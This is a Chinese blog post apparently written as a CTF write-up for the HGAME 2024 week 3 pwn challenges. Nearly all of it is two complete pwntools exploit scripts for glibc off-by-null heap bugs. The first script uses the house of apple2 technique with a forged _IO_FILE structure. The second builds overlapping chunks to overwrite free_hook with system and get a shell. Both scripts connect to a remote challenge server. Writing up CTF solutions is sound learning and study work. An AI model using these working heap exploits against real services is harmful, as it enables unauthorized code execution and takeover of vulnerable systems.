HGAME 2024 WEEK3 PWN

最新推荐文章于 2024-02-23 22:10:02 发布
最新推荐文章于 2024-02-23 22:10:02 发布
阅读量475 收藏 8
点赞数 10
分类专栏: # 每日一“胖“ 文章标签: off by null
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/136233121
版权
文章详细描述了在两个不同的漏洞场景中,利用EldenRing3游戏中的内存溢出和glibc的offbynull漏洞,执行堆栈溢出以及构造overlapping劫持free_hook,进而实现系统调用的过程。
摘要由CSDN通过智能技术生成

简单记录一下吧,只会做简答题的菜狗

EldenRing3

glibc 2.32 off by null

在这里插入图片描述
house of apple2 一套带走:

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'
io = remote("106.14.57.14", 30188)
#io = process("./vuln")
elf = ELF("./vuln")
libc = elf.libc

def debug():
        gdb.attach(io)
        pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b'>'

def add(idx, size):
        sla(menu, b'1')
        sla(b'Index: ', byte(idx))
        sla(b'Size: ', byte(size))

def dele(idx):
        sla(menu, b'2')
        sla(b'Index: ', byte(idx))


def show(idx):
        sla(menu, b'4')
        sla(b'Index: ', byte(idx))

def edit(idx, data):
        sla(menu, b'3')
        sla(b'Index: ', byte(idx))
        sda(b'Content: ', data)

add(8, 0x508)
add(0, 0x510)
add(1, 0x500)
add(2, 0x520)
add(3, 0x500)
dele(2)
add(4, 0x530)

show(2)

#libc_base = addr64(b'\n')
libc_base = addr8(6) - 0x1e4030
info("libc_base", libc_base)

edit(2, b'A'*16)

show(2)
rut(b'A'*16)
heap_base = addr8(6)
info("heap_base", heap_base)

edit(2, p64(libc_base+0x1e4030)*2)

_IO_all_list = libc_base + 0x1e45c0
info("_IO_all_list", _IO_all_list)

dele(0)

pay = p64(libc_base+0x1e4030)*2 + p64(heap_base) + p64(_IO_all_list-0x20)
edit(2, pay)

add(5, 0x550)

chunk_addr = heap_base - 0xa30
info("chunk_addr", chunk_addr)

edit(8, b'A'*0x500 + p32(0xfffff7f5) + b';sh\x00')

fake_io_file = p64(0)*2 + p64(1) + p64(2)
fake_io_file = fake_io_file.ljust(0xa0-0x10, b'\x00') + p64(chunk_addr+0x100) # _wide_data
fake_io_file = fake_io_file.ljust(0xc0-0x10, b'\x00') + p64(0xffffffffffffffff) # _mode
fake_io_file = fake_io_file.ljust(0xd8-0x10, b'\x00') + p64(libc_base+0x1e4f80) # vtable
fake_io_file = fake_io_file.ljust(0x100-0x10 + 0xe0, b'\x00') + p64(chunk_addr+0x200)
fake_io_file = fake_io_file.ljust(0x200-0x10, b'\x00') + p64(0)*13 + p64(libc_base+0x503c0)

edit(0, fake_io_file)


sla(menu, b'5')

#debug()


sh()

mm

glibc 2.27 off by null

在这里插入图片描述
构造 overlapping 劫持 free_hook

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'

io = remote("106.14.57.14", 31809)
#io = process("./vuln")
elf = ELF("./vuln")
libc = elf.libc

def debug():
        gdb.attach(io)
        pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b'Your choice:'

def add(idx, size, data):
        sla(menu, b'1')
        sla(b'Index: ', byte(idx))
        sla(b'Size: ', byte(size))
        sda(b'Content: ', data)

def dele(idx):
        sla(menu, b'3')
        sla(b'Index: ', byte(idx))


def show(idx):
        sla(menu, b'2')
        sla(b'Index: ', byte(idx))


for i in range(7):
        add(i, 0xf8, b'A')

add(7,  0xf8, b'A')
add(8,  0x20, b'B')
add(9,  0x20, b'B')
add(10, 0xf8, b'A')
add(11, 0x20, b'C')

for i in range(7):
        dele(i)

dele(7)
dele(9)

add(9, 0x28, b'A'*0x20 + p64(0xf0+0x10+0x30+0x30))
dele(10)

for i in range(7):
        add(i, 0xf8, b'A')

add(7, 0xf8, b'A')

show(8)

libc_base = addr8(6) - 0x3ebca0
info("libc_base", libc_base)

free_hook = libc_base + 0x3ed8e8
system = libc_base + 0x4f420

info("free_hook", free_hook)
info("system", system)

dele(11)
dele(9)

add(12, 0x38, b'A'*0x28 + p64(0x31) + p64(free_hook))

#dele(12)

add(14, 0x20, b'/bin/sh\x00')
add(15, 0x20, p64(system))

dele(14)
#debug()
sh()
XiaozaYa
关注
专栏目录
【WP】hgame2023 week4 Pwn
woodwhale的博客
02-07 795
hgame2023 week4 Pwn
HGAME 2022 week1 个人部分WP
qazwsxeb的博客
02-10 3825
寒假期间,小萌新在家瞎搞CTF,也是第一次参加HGAME,整体来说题目是简单的,但对于我这个萌新菜鸟来说,还是一头雾水,只会做一些简单的密码题,week1的web和misc还能做出几题,后面几周就完全不会了,二进制完全看不懂。。。已经坐牢有一段时间了,想想还是不要浪费时间,记录下这次比赛,也是一种学习。 本人还是个萌新,WP可能会存在很多错误,望各位大佬勿喷,也请多多指正。 web Tetris plus 描述:据说没人能超过 3000 分。要是做题做累了,就来玩玩小游戏吧(x 这道题很明显是玩游
HGAME 2024 WEEK3 Reverse WP
qq_36612618的博客
02-22 1309
她与VN皆遗憾”
[hgame 2024 week3] crypto/pwn
weixin_52640415的博客
02-23 1067
多组低解密指数攻击,b = [m*t%p%(2^32+1) for t in A] 给出模(2^32+1)的余,libc-2.32 UAF largebinAttack 修改mp_ tcache_bins
HGAME 2024 WEEK 1
Fab1an的博客
02-08 1260
nc 登录上去即可获得flag。
HGAME 2024 WEEK 1 :web ezHTTP
weixin_74790320的博客
02-07 689
然后提示通过那些东西访问页面,User-Agent: 是构造你浏览器访问信息的,所以复制右边那一串替代就好了。这次主要查漏补缺了知识点伪造ip地址还有:X-Real-IP:这种方式。但是本题这里构造这两个都是没有反应的,就有第三种方式。然后要求我们从本地访问,那就是伪造ip。然后我们就可以得到右边有一长串的东西。我们把它base64解码一下看看。第一想法就是Referer伪造。然后构造伪造的Referer。看到这个就知道是文件头伪造。
HGAME 2024 WEEK2 Web方向题解 全
Jay17的博客
02-14 1974
HGAME 2024 WEEK2 Web方向题解 全
HGAME 2024 week wp
NYG694的博客
02-15 1098
2024Hgame题目
hgame week1 2021 pwn
清霂的博客
04-23 341
目录onceletter once 写这个题的时候发现了一个工具,可以修改题目加载的libc.so和ld.so文件 patchelf 注释掉的是本地环境下的情况 #!/usr/bin/env python2 #env1=ubuntu 16.04 native #env2=ld-2.27.so libc.2.27 from pwn import * arch = "amd64" filename = "once" context(os="linux", arch=arch, log_level="d
hgame 2024 week1
yzzob的博客
02-17 950
1.请从vidar.club访问这个页面>>Referer: vidar.club2.请通过Mozilla/5.0 (Vidar;VidarOS x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0访问此页面3.请从本地访问这个页面>>
HGAME 2017 or 2018 PWN levels
qq_42192672的博客
11-12 948
这个算是做之前的复现吧,感谢Veritas501 WEEK1 1.flag server 拖进IDA看一下 流程倒着看,要有flag-----v8=1-----v5=v6-----s1=admin,我们可以把s1覆盖掉-----username长度不能大于63,不能等于0-----之后还要猜出随机数v6,看一下怎么覆盖 这些变量都在一起,美滋滋 exp from pwn...
【wp】hgame2023 week3 Re&&Pwn
woodwhale的博客
02-01 928
hgame2023 week3 2个re和3个pwn的wp
stays mad 反PCL宣传库。Anti PCL pro.zip
10-31
stays mad 反PCL宣传库。Anti PCL pro
伊犁师范大学在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
yolo算法-植物数据集-1417张图像带标签adamweeds.zip
最新发布
10-31
yolo系列算法目标检测数据集,包含标签,可以直接训练模型和验证测试,数据集已经划分好,适用yolov5,yolov8,yolov9,yolov7,yolov10,yolo11算法; 包含两种标签格:yolo格式(txt文件)和voc格式(xml文件),分别保存在两个文件夹中; yolo格式:<class> <x_center> <y_center> <width> <height>, 其中: <class> 是目标的类别索引(从0开始)。 <x_center> 和 <y_center> 是目标框中心点的x和y坐标,这些坐标是相对于图像宽度和高度的比例值,范围在0到1之间。 <width> 和 <height> 是目标框的宽度和高度,也是相对于图像宽度和高度的比例值
clickhouse-jdbc驱动jar文件用于建立jdbc链接
10-31
clickhouse-jdbc驱动jar文件用于建立jdbc链接
辽宁何氏医学院在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
泰尔指数、泰尔指数模型(含案例源码+数据+stata详细操作过程)-最新出炉.zip
10-31
泰尔指数、泰尔指数模型(含案例源码+数据+stata详细操作过程)-最新出炉.zip
虚拟机挑战解析:hgame-week4-easyvm与cg-ctf WxyVM
"虚拟机题目解析,包括hgame-week4-easyvm、cg-ctf wxyVM1/2,涉及虚拟机基础知识、数据处理及逆向工程" 虚拟机技术是计算机科学中的一个重要领域,它允许在单一硬件系统上运行多个操作系统实例。在网络安全和密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值